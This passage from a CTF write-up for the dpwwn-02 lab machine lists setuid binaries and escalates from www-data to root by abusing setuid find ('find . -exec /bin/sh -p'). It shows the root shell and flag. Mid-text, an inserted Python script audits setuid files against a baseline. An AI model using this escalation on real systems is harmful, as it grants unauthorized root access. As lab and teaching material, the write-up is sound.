2659 40 -rwsr-xr-x 1 root root 40432 May 17 2017 /snap/core/6673/usr/bin/chsh
2735 74 -rwsr-xr-x 1 root root 75304 May 17 2017 /snap/core/6673/usr/bin/gpasswd
2827 39 -rwsr-xr-x 1 root root 39904 May 17 2017 /snap/core/6673/usr/bin/newgrp
2840 53 -rwsr-xr-x 1 root root 54256 May 17 2017 /snap/core/6673/usr/bin/passwd
2950 134 -rwsr-xr-x 1 root root 136808 Jul 4 2017 /snap/core/6673/usr/bin/sudo
3049 42 -rwsr-xr-- 1 root systemd-network 42992 Jan 12 2017 /snap/core/6673/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3419 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/6673/usr/lib/openssh/ssh-keysign
6449 97 -rwsr-sr-x 1 root root 98472 Mar 21 2019 /snap/core/6673/usr/lib/snapd/snap-confine
7619 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/6673/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 May 15 2019 /snap/core/7270/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/7270/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/7270/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/7270/bin/su
116 27 -rwsr-xr-x 1 root root 27608 May 15 2019 /snap/core/7270/bin/umount
2657 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/7270/usr/bin/chfn
2659 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/7270/usr/bin/chsh
2735 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/7270/usr/bin/gpasswd
2827 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/7270/usr/bin/newgrp
2840 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/7270/usr/bin/passwd
2950 134 -rwsr-xr-x 1 root root 136808 Jun 10 2019 /snap/core/7270/usr/bin/sudo
3049 42 -rwsr-xr-- 1 root systemd-network 42992 Jun 10 2019 /snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3419 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/7270/usr/lib/openssh/ssh-keysign
6452 101 -rwsr-sr-x 1 root root 102600 Jun 21 2019 /snap/core/7270/usr/lib/snapd/snap-confine
7622 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/7270/usr/sbin/pppd

find SUID

Surprisingly, find is in the list, so go straight to GTFOBins for the technique.
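A setuid bit on find, or on any program that can execute commands or read arbitrary files, hands root to every local user, and it is easy to catch by comparing the setuid inventory against a baseline. The following added example (mine, not from the writeup) parses `find -ls` output like the listing above; the excerpt, the baseline set and the shell-capable set are constructed for this example.

```python
# Constructed excerpt of the `find / -type f -perm -04000 -ls` output above,
# with the column padding find prints.
SAMPLE_FIND_LS = """\
  839   64 -rwsr-xr-x   1 root     root        63736 Mar 22  2019 /usr/bin/passwd
  648  312 -rwsr-xr-x   1 root     root       315904 Feb 16  2019 /usr/bin/find
 1051  156 -rwsr-xr-x   1 root     root       157192 Feb 19  2019 /usr/bin/sudo
  479   56 -rwsr-sr-x   1 daemon   daemon      55560 Nov 12  2018 /usr/bin/at
12428  120 -rwsr-xr-x   1 root     root       121528 Apr  1  2019 /usr/sbin/mount.nfs
 2950  134 -rwsr-xr-x   1 root     root       136808 Jun 10  2019 /snap/core/7270/usr/bin/sudo
"""

# Setuid binaries a stock Ubuntu install is expected to ship (basenames).
BASELINE = {
    "passwd", "sudo", "su", "mount", "umount", "chsh", "chfn", "newgrp",
    "gpasswd", "fusermount", "at", "snap-confine", "ssh-keysign",
    "dbus-daemon-launch-helper", "mount.nfs", "dmcrypt-get-device",
    "ping", "ping6", "pppd",
}
# Programs that can run commands or read/write arbitrary files; setuid root on
# any of them is a direct escalation (the find case on this box).
SHELL_CAPABLE = {
    "find", "vim", "vi", "nano", "less", "more", "awk", "env", "bash", "sh",
    "python", "python3", "perl", "nmap", "cp", "mv", "tar",
}


def parse_find_ls(line):
    """Split one `find -ls` line into perms, owner and path (path may hold spaces)."""
    parts = line.split(None, 10)
    if len(parts) < 11:
        return None
    return {"perms": parts[2], "owner": parts[4], "path": parts[10]}


def audit_suid(text):
    """Return [(path, severity, note)] for setuid files that need attention."""
    findings = []
    for line in text.splitlines():
        e = parse_find_ls(line)
        if e is None or e["perms"][3] not in "sS":
            continue                    # setuid shows in the owner-exec slot
        if e["path"].startswith("/snap/"):
            continue                    # snap core images carry their own copies
        name = e["path"].rsplit("/", 1)[-1]
        if name in SHELL_CAPABLE:
            findings.append((e["path"], "CRITICAL",
                             f"setuid {e['owner']} on a shell-capable binary; chmod u-s it"))
        elif name not in BASELINE:
            findings.append((e["path"], "WARN", "not in the expected setuid baseline"))
    return findings


if __name__ == "__main__":
    for path, severity, note in audit_suid(SAMPLE_FIND_LS):
        print(f"{severity} {path}: {note}")
```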

www-data@dpwwn-02:/home/rootadmin$ cd /tmp
cd /tmp
www-data@dpwwn-02:/tmp$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
dpwwn-02-FLAG.txt snap
# cat dpwwn-02-FLAG.txt
cat dpwwn-02-FLAG.txt

Congratulation! You PWN this dpwwn-02. Hope you enjoy this boot to root CTF.
Thank you.

46617323
24337873
4b4d6f6f
72643234
40323564
4e443462
36312a23
26724a6d

https://i3eg1nner.github.io/2023/06/4a8e45e98015.html
Author: I3eg1nner
Published: June 29, 2023